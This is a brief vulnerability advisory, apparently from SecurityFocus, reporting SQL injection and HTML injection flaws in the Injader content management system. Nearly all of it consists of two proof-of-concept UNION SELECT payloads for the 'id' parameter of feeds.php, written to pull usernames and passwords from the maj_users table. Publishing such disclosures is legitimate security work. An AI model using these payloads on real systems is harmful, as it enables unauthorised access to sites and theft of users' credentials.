Injader SQL Injection and HTML Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proofs of concept are available:

http://www.example.com/upload/feeds.php?name=articles&id=<SQL>

Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758


 

Privacy Statement
Copyright 2010, SecurityFocus